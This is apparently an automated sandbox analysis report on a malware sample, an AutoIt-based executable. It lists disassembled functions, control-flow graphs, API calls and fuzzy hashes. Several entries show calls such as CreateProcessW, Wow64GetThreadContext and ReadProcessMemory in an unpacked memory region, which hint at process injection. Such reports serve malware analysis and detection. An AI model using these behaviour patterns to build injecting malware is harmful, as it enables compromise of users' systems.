                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1474 414f10-414f2c 1475 414f4f 1474->1475 1476 414f2e-414f31 1474->1476 1477 414f51-414f55 1475->1477 1476->1475 1478 414f33-414f35 1476->1478 1479 414f37-414f46 call 417f23 1478->1479 1480 414f56-414f5b 1478->1480 1492 414f47-414f4c call 417ebb 1479->1492 1481 414f6a-414f6d 1480->1481 1482 414f5d-414f68 1480->1482 1485 414f7a-414f7c 1481->1485 1486 414f6f-414f77 call 4131f0 1481->1486 1482->1481 1484 414f8b-414f9e 1482->1484 1490 414fa0-414fa6 1484->1490 1491 414fa8 1484->1491 1485->1479 1489 414f7e-414f89 1485->1489 1486->1485 1489->1479 1489->1484 1494 414faf-414fb1 1490->1494 1491->1494 1492->1475 1497 4150a1-4150a4 1494->1497 1498 414fb7-414fbe 1494->1498 1497->1477 1499 414fc0-414fc5 1498->1499 1500 415004-415007 1498->1500 1499->1500 1501 414fc7 1499->1501 1502 415071-415072 call 41e6b1 1500->1502 1503 415009-41500d 1500->1503 1504 415102 1501->1504 1505 414fcd-414fd1 1501->1505 1511 415077-41507b 1502->1511 1507 41500f-415018 1503->1507 1508 41502e-415035 1503->1508 1514 415106-41510f 1504->1514 1509 414fd3 1505->1509 1510 414fd5-414fd8 1505->1510 1512 415023-415028 1507->1512 1513 41501a-415021 1507->1513 1515 415037 1508->1515 1516 415039-41503c 1508->1516 1509->1510 1519 4150a9-4150af 1510->1519 1520 414fde-414fff call 41ee9b 1510->1520 1511->1514 1521 415081-415085 1511->1521 1522 41502a-41502c 1512->1522 1513->1522 1514->1477 1515->1516 1517 415042-41504e call 41453a call 41ed9e 1516->1517 1518 4150d5-4150d9 1516->1518 1542 415053-415058 1517->1542 1527 4150eb-4150fd call 417f23 1518->1527 1528 4150db-4150e8 call 4131f0 1518->1528 1523 4150b1-4150bd call 4131f0 1519->1523 1524 4150c0-4150d0 call 417f23 1519->1524 1536 415099-41509b 1520->1536 1521->1518 1529 415087-415096 1521->1529 1522->1516 1523->1524 1524->1492 1527->1492 1528->1527 1529->1536 1536->1497 1536->1498 1543 415114-415118 1542->1543 1544 41505e-415061 1542->1544 1543->1514 1544->1504 1545 415067-41506f 1544->1545 1545->1536
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3886058894-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1546 401be0-401bf5 1547 401bfb-401c12 call 4013a0 1546->1547 1548 401cde-401ce3 1546->1548 1551 42a9a0-42a9b0 LoadStringW 1547->1551 1552 401c18-401c34 call 4021e0 1547->1552 1554 42a9bb-42a9c8 call 40df50 1551->1554 1556 401c3a-401c3e 1552->1556 1557 42a9cd-42a9ea call 40d3b0 call 437a81 1552->1557 1562 401c53-401cd9 call 4131f0 call 41326a call 411691 Shell_NotifyIconW call 402620 1554->1562 1556->1554 1560 401c44-401c4e call 40d3b0 1556->1560 1557->1562 1570 42a9f0-42aa04 call 40d3b0 call 437a81 1557->1570 1560->1562 1562->1548
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00401C62
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Line:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1620655955-1585850449
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1579 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0538E3C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1580 538e3c0-538e506 call 538c010 call 538e2b0 CreateFileW 1587 538e508 1580->1587 1588 538e50d-538e51d 1580->1588 1589 538e5bd-538e5c2 1587->1589 1591 538e51f 1588->1591 1592 538e524-538e53e VirtualAlloc 1588->1592 1591->1589 1593 538e540 1592->1593 1594 538e542-538e559 ReadFile 1592->1594 1593->1589 1595 538e55b 1594->1595 1596 538e55d-538e597 call 538e2f0 call 538d2b0 1594->1596 1595->1589 1601 538e599-538e5ae call 538e340 1596->1601 1602 538e5b3-538e5bb ExitProcess 1596->1602 1601->1602 1602->1589
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0538E2B0: Sleep.KERNELBASE(000001F4), ref: 0538E2C1
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0538E4FC
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileSleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 699YD2QNMETYQ77I
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2694422964-3082335323
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 969caebfaa7628107d777b2a592666ce9a98ece6080561e4e6ceceec16a5b1cd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ad98ff97df18d36a5c6b37fdf6e3483268b04e160451b2ead197da283ebad1b5
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 969caebfaa7628107d777b2a592666ce9a98ece6080561e4e6ceceec16a5b1cd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB516F30E04348EAEF15DBE4D844BEEBA79AF54700F004599E609BB2C0D7B95B45CB65
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00413AA6
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                                                                                                                                                                                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                                                                                                                                                                                                                                                                                                                • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                                                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2714421763-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                                                                                                                                                                                                                                                                                                                • _strcat.LIBCMT ref: 0040F603
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1194219731-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0538D2B0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 0538DA6B
                                                                                                                                                                                                                                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0538DB01
                                                                                                                                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0538DB23
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2438371351-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 49f034481e4a2a9c76d3d4f79b3ba747338e11c8cb4f758ad685f2e7fa4d9985
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4562FA70A142589BEB24DFA4C840BEEB376FF58300F1095A9D10DEB2D4E7B59E81CB59
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconNotifyShell__memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 928536360-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                                                                                                                                                                                                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                                                                                                                                                                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1411284514-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
